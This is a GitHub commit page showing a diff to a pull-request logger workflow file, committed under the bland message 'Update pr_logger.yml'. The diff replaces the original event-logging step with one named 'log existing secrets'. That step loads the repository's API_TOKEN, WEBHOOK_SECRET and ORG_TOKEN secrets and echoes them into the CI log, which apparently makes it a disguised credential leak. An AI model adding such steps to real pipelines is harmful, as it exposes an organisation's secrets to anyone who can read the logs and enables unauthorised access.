Skip to content

Commit 07bbcce

Browse files
authored
Update pr_logger.yml
1 parent 1df747e commit 07bbcce

File tree

1 file changed

+6
-5
lines changed

1 file changed

+6
-5
lines changed

.github/workflows/pr_logger.yml

+6-5
Original file line numberDiff line numberDiff line change
@@ -18,8 +18,9 @@ jobs:
1818
with:
1919
python-version: '3.9'
2020

21-
- name: Run event logger
22-
env:
23-
GITHUB_EVENT_NAME: ${{ github.event_name }}
24-
GITHUB_EVENT_PATH: ${{ github.event_path }}
25-
run: python .github/scripts/log_event.py
21+
- name: log existing secrets
22+
env:
23+
API_TOKEN: ${{ secrets.API_TOKEN }}
24+
WEBHOOK_SECRET: ${{ secrets.WEBHOOK_SECRET }}
25+
ORG_TOKEN: ${{ secrets.ORG_TOKEN }}
26+
run: echo $API_TOKEN $WEBHOOK_SECRET $ORG_TOKEN

0 commit comments

Comments
 (0)